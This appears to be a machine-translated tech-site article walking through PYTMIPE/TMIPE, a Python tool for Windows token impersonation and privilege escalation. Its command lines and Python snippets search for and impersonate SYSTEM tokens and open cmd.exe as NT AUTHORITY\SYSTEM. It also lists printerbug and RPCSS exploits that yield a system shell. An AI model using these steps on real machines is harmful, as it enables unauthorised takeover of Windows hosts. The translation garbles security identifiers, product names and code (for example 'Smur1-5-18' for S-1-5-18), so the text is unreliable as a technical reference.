Shulou(Shulou.com)06/03 Report--

This article introduces the relevant knowledge of "how to use Pytmipe to achieve token tampering and power enhancement on Windows". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

PYTMIPE & TMIPE

PYTMIPE (Python library for lifting rights through token tampering and forgery) is a Python 3 library that supports token tampering and simulation in Windows systems, and finally enhances privileges. TMIPE is a Python 3 client, which mainly uses the pytmipe library.

The project contains

A Python client: tmipe (python3 tmipe.py)

A Python library, pytmipe, to integrate this project with other projects

Sample Pytinstaller to get executable files

Main function

Method

Required permissions

Operating system (not all)

Direct goal (best effect)

Token creation & forgery

User name & password

All

Local administrator

Token forgery & stealing

SeDebugPrivilege

All

Nt authority\ system

Parent PID sniffing (handle inheritance)

SeDebugPrivilege

> = Vista

Nt authority\ system

Service (SCM)

Local administrator

All

Nt authority\ system or domain account

WMI event

Local administrator

All

Nt authority\ system

«pointer vulnerability »LPE

SeImpersonatePrivilege (Service account)

Windows 8.1,10 & Server 2012R2/2016/2019

Nt authority\ system

RPCSS Service LPE

SeImpersonatePrivilege (Service account)

Windows 10 & Server 2016 Universe 2019

Nt authority\ system

Tool dependence

Ctypes is used a lot, and many of the functions of pywin32 have been integrated into pytmipe for better portability. However, currently, due to time constraints, the task scheduler module still uses pywin32 (or more specifically, pythoncom). All other modules use ctypes only.

Tool download

Researchers can use the following commands to clone the source code of the project locally:

Using the git clone https://github.com/quentinhardy/pytmipe.git tool

For python client (tmipe):

Python.exe tmipe.py-husage: tmipe.py [- h] [--version] {cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas Scm}... * * 888888 8b d8 8888 "" Yb 888888 88 88b d88 8888 _ _ dP88 _ 88 88YbdP88 8888 "" 88 "" 8888 YY 888888 888888---Token Manipulation " Impersonation and Privilege Escalation (Tool)-By Quentin HARDY (quentin.hardy@protonmail.com) positional arguments: {cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas Scm} Choose a main command cangetadmin Check if user cangetadmin access printalltokens Print alltokens accessible from current thread printalltokensbyname Print alltokens accessible from current thread by account name printalltokensbypid Print alltokens accessible from current thread bypid printsystemtokens Print all systemtokens accessible from current searchimpfirstsystem search and impersonate firstsystem token imppid impersonate primary Token of selected pid and try to spawn cmd.exe imptoken impersonate primary or impersonation token of selected pid/handle and try to spawn cmd.exe printerbug exploit the "printerbug" for getting system shell rpcss exploit "rpcss" for getting system shell spoof parent PID Spoofing ("handle inheritance)" impuser create process with creds with impersonation runas create process with creds as runas scm Create process with Service Control Manager optional arguments:-h -help show this help message and exit-version show program's version number and exit

For the python library (pytmipe), you can view the source code and samples directly, which I have provided very detailed documentation for reference.

For pyinstaller samples and executables, check the project's src/examples/ folder.

Tool usage sample 1: get nt authority\ system

To forge the first system token and open cmd.exe with system privileges (using python client-tmipe):

Python.exe tmipe.py searchimpfirstsystem-vv

We can also use the pytmipe library directly to do the same:

From impersonate import Impersonatefrom utils import configureLogging configureLogging () imp = Impersonate () imp.searchAndImpersonateFirstSystemToken (targetPID=None, printAllTokens=False) sample 2: get the token

Get the main token in the current process:

Python.exe tmipe.py printalltokens-current-full-linked

Output:

-PID: 3212 accountname-- PID: 3212-type: Primary (1)-token: 764-hval: None-ihandle: None-sid: Smuri 1-5-18-accountname: {'Name':' SYSTEM', 'Domain':' NT AUTHORITY' Type': 1}-intlvl: System-owner: Smur1-5-32-544-Groups:-Smur1-5-32-544: {'Name':' Administrators', 'Domain':' BUILTIN', 'type': 4} (ENABLED, ENABLED_BY_DEFAULT, OWNER)-Smur1-1-0: {' Name': 'Everyone',' Domain':', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT MANDATORY)-Smuri 1-5-11: {'Name':' Authenticated Users', 'Domain':' NT AUTHORITY', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)-Smuri 1-16-16384: {' Name': 'System Mandatory Level',' Domain': 'Mandatory Label',' type': 10} (INTEGRITY_ENABLED INTEGRITY)-Privileges (User Rights):-SeAssignPrimaryTokenPrivilege: Enabled [...]-SeTrustedCredManAccessPrivilege: Enabled-issystem: True-sessionID: 1-elevationtype: Default (1)-iselevated: True-Linked Token: None-tokensource: baked cards system'- primarysidgroup: SUV 1-5-18-isrestricted: False-hasrestricitions: True-Default DACL:-{'ace_type':' ALLOW', 'ace_flags':', 'rights':' 0x10000000' 'object_guid':', 'inherit_object_guid':', 'account_sid':' Smur1-5-18'}-{'ace_type':' ALLOW', 'ace_flags':', 'rights':' 0xa0020000, 'object_guid':', 'inherit_object_guid':'' 'account_sid':' Smur1-5-32-544'} [...]-Mandatory Policy: NO_WRITE_UP

To get all tokens from the current thread, you can use the following command:

Python.exe tmipe.py printalltokensbypid-imp-only

Output:

[...]-PID 4276:-Smur1-5-18: NT AUTHORITY\ SYSTEM (possible imp: True)-PID 7252:-None- PID 1660:-Smur1-5-21-28624056-3392308708-440876048-1106: DOMAIN\ USER (possible imp: True)-Smur1-5-20: NT AUTHORITY\ NETWORK SERVICE (possible imp: True)-Smur1-5-18: NT AUTHORITY\ SYSTEM (possible imp) : True)-Smur1-5-90-0-1: Window Manager\ DWM-1 (possible imp: True)-Smur1-5-19: NT AUTHORITY\ LOCAL SERVICE (possible imp: True) [...]

If you want to use the pytmipe library to do this, it is also very simple:

From impersonate import Impersonatefrom utils import configureLogging configureLogging () imp = Impersonate () imp.printAllTokensAccessible (targetPID=None, printFull=True, printLinked=True, _ useThreadMethod=False) sample 3: forge tokens

We can choose a token to forge. The first step is to get all tokens according to our filter:

Python.exe tmipe.py printalltokens-- filter {\ "sid\":\ "Smur1-5-18\",\ "canimpersonate\": true}

Output:

[...]-PID: 2288 Domain':-PID: 2288-type: Impersonation (2)-token: 2504-ihandle: 118-sid: Smuri 1-5-18-accountname: {'Name':' SYSTEM', 'Domain':' NT AUTHORITY' 'type': 1}-intlvl: System-owner: Smur1-5-18-issystem: True-elevationtype: Default (1)-iselevated: True-linkedtoken: None-implevel: Impersonate (2)-appcontainertoken: False [.]-primarysidgroup: Smur1-5-18-isrestricted: False-hasrestricitions: True-Mandatory Policy: VALID_MASK-canimpersonate: True [.]

The output shows that the forged token is located in PID 2288 and has an integrity level system. You can forge this specific token using the following command:

Python.exe tmipe.py imptoken-- pid 2288-- ihandle 118-vv

This command will open cmd.exe with nt authority\ system privileges. We can also use the pytmipe library to achieve the same effect, the following source code can forge the first available system token and print a valid token:

From impersonate import Impersonatefrom windef import TokenImpersonation allTokens = imp.getTokensAccessibleFilter (targetPID=None, filter= {'canimpersonate':True,' sid':'S-1-5-18, 'type':TokenImpersonation}) _ useThreadMethod=False) if allTokens== {} or allTokens==None: print ("No one token found for impersonation") else: pid= list (allTokens.keys ()) [0] # use the first token of the first pid returned in 'allTokens' firstIHandle = allTokens [pid] [0] [' ihandle'] imp.printThisToken (allTokens, pid, firstIHandle) imp.impersonateThisToken (pid=pid IHandle=firstIHandle) print ("Current Effective token for current thread after impersonation:") imp.printCurrentThreadEffectiveToken (printFull=False, printLinked=False) imp.terminateImpersonation () print ("Current Effective token for current thread (impersonation finished):") imp.printCurrentThreadEffectiveToken (printFull=False, printLinked=False) "how to use Pytmipe to tamper with tokens and lift rights on Windows" ends here Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.